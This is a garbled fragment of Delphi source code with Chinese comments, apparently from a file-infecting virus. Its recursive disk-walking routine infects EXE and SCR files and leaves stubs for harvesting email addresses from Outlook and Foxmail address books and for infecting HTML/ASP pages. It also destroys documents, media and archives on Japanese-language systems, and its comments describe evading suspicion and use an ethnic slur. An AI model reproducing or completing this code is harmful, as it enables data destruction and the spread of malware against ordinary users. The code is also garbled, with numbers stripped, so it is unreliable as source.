|
end; begin if (FindFirst(Path + Mask faAnyFile SearchRec) = ) then begin repeat PeekMessage(Msg PM_REMOVE); //调整消息队列避免引起怀疑 if IsValidDir(SearchRec) = then begin Fn := Path + SearchRecName; Ext := UpperCase(ExtractFileExt(Fn)); if (Ext = EXE) or (Ext = SCR) then begin InfectOneFile(Fn); //感染可执行文件 end else if (Ext = HTM) or (Ext = HTML) or (Ext = ASP) then begin //感染HTML和ASP文件将Base编码后的病毒写入 //感染浏览此网页的所有用户 //哪位大兄弟愿意完成之? end else if Ext = WAB then //Outlook地址簿文件 begin //获取Outlook邮件地址 end else if Ext = ADC then //Foxmail地址自动完成文件 begin //获取Foxmail邮件地址 end else if Ext = IND then //Foxmail地址簿文件 begin //获取Foxmail邮件地址 end else begin if IsJap then //是倭文操作系统 begin if (Ext = DOC) or (Ext = XLS) or (Ext = MDB) or (Ext = MP) or (Ext = RM) or (Ext = RA) or (Ext = WMA) or (Ext = ZIP) or (Ext = RAR) or (Ext = MPEG) or (Ext = ASF) or (Ext = JPG) or (Ext = JPEG) or (Ext = GIF) or (Ext = SWF) or (Ext = PDF) or (Ext = CHM) or (Ext = AVI) then SmashFile(Fn); //摧毁文件 end; end; end; //感染或删除一个文件后睡眠毫秒避免CPU占用率过高引起怀疑 Sleep(); until (FindNext(SearchRec) <> ); end; FindClose(SearchRec); SubDir := TStringListCreate; if (FindFirst(Path + ** faDirectory SearchRec) = ) then begin repeat if IsValidDir(SearchRec) = then SubDirAdd(SearchRecName); until (FindNext(SearchRec) <> ); end; FindClose(SearchRec); Count := SubDirCount ; for i := to Count do LoopFiles(Path + SubDirStrings[i] + Mask); FreeAndNil(SubDir); end; { 遍历磁盘上所有的文件 } [] [] [] [] [] |
